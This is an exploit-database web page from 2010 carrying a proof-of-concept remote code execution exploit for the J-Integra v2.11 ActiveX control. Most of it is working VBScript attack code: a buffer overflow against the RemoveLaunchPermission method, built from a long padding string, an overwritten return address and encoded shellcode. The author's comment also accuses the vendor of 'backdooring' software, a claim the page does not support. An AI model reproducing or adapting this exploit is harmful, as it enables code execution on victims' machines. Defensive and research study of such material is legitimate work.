[remote exploits] - J-Integra v2.11 Remote Code Execution Ex
Posted on 01 December 2010
<!DOCTYPE html PUBLIC '-//W3C//DTD XHTML 1.0 Strict//EN' 'http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd'><html xmlns='http://www.w3.org/1999/xhtml'><head><meta http-equiv='Content-Type' content='text/html; charset=utf-8' /><meta http-equiv='Content-Language' content='en' /><title>J-Integra v2.11 Remote Code Execution Exploit | Inj3ct0r - exploit database : vulnerability : 0day : shellcode</title><meta name='description' content='J-Integra v2.11 Remote Code Execution Exploit by bz1p in remote exploits | Inj3ct0r 1337 - exploit database : vulnerability : 0day : shellcode' /><link rel='shortcut icon' href='/favicon.ico' type='image/x-icon' /><link rel='alternate' type='application/rss+xml' title='Inj3ct0r RSS' href='/rss' /><script type='text/javascript'>var _gaq = _gaq || [];_gaq.push(["_setAccount", "UA-12725838-1"]);_gaq.push(["_setDomainName", "none"]);_gaq.push(["_setAllowLinker", true]);_gaq.push(["_trackPageview"]);(function(){var ga = document.createElement("script"); ga.type = "text/javascript"; ga.async = true;ga.src = ("https:" == document.location.protocol ? "https://ssl" : "http://www") + ".google-analytics.com/ga.js";var s = document.getElementsByTagName("script")[0]; s.parentNode.insertBefore(ga, s);})();</script></head><body><pre>============================================= J-Integra v2.11 Remote Code Execution Exploit ============================================= <html> <!-- j-integra v2.11 Remote code execution vulnerability Discovered on: Thursday, October 28, 2010, 10:10:12 PM Download: http://j-integra.intrinsyc.com/ Author: bz1p, bz1p@bshellz.net impact: LOW, due to the object NOT marked safe for scripting Tested on: XP SP3 IE7 CVE: ? (0day) NOTE: This vuln was silently patched by the developers (v2.12), hence I am providing this PoC. They did not change the versions for DCOMConfig.dll, so I can only conclude that they are sneaky and should be slapped for backdooring software and making customers pay mula. --> <object classid='clsid:F21507A7-530F-4A89-8FE4-9D989670FD2C' id='target' ></object> <script language='vbscript'> esp = String(100, "B") calc = unescape("%eb%03%59%eb%05%e8%f8%ff%ff%ff%49%49%49%49%48%49") & _ unescape("%49%49%49%49%49%49%49%49%49%49%49%49%51%5a%6a%68") & _ unescape("%58%50%30%42%31%42%41%6b%41%41%78%32%41%42%32%42") & _ unescape("%41%30%42%41%41%58%38%41%42%50%75%59%79%39%6c%4a") & _ unescape("%48%50%44%63%30%35%50%43%30%4c%4b%57%35%77%4c%4c") & _ unescape("%4b%51%6c%35%55%64%38%77%71%6a%4f%4c%4b%62%6f%45") & _ unescape("%48%4e%6b%31%4f%45%70%55%51%6a%4b%73%79%6e%6b%70") & _ unescape("%34%6c%4b%46%61%7a%4e%70%31%4b%70%4e%79%6e%4c%6c") & _ unescape("%44%49%50%52%54%67%77%5a%61%59%5a%34%4d%55%51%6f") & _ unescape("%32%4a%4b%79%64%37%4b%51%44%41%34%35%54%71%65%6d") & _ unescape("%35%4e%6b%53%6f%47%54%65%51%4a%4b%31%76%4e%6b%46") & _ unescape("%6c%30%4b%6e%6b%51%4f%75%4c%54%41%58%6b%4c%4b%77") & _ unescape("%6c%6e%6b%66%61%58%6b%6d%59%33%6c%46%44%46%64%6a") & _ unescape("%63%35%61%6b%70%71%74%6e%6b%63%70%54%70%6f%75%6f") & _ unescape("%30%54%38%56%6c%4c%4b%61%50%36%6c%4e%6b%34%30%35") & _ unescape("%4c%4c%6d%6e%6b%43%58%75%58%58%6b%54%49%4c%4b%4d") & _ unescape("%50%6c%70%43%30%57%70%55%50%6e%6b%32%48%35%6c%71") & _ unescape("%4f%67%41%6b%46%53%50%56%36%6b%39%48%78%4d%53%4f") & _ unescape("%30%71%6b%32%70%33%58%4c%30%4d%5a%56%64%43%6f%52") & _ unescape("%48%6a%38%4b%4e%4c%4a%66%6e%31%47%4b%4f%6b%57%61") & _ unescape("%73%70%61%30%6c%71%73%64%6e%70%65%73%48%72%45%35") & _ unescape("%50%68") eip = unescape("%2f%55%02%10") ' CALL EDI arg1=String(253, "A") arg1 = arg1 + eip + esp + calc arg2="defaultV" target.RemoveLaunchPermission arg1 ,arg2 </script> </html> # <a href='http://1337db.com/'>1337db.com</a> [2010-12-01]</pre></body></html>
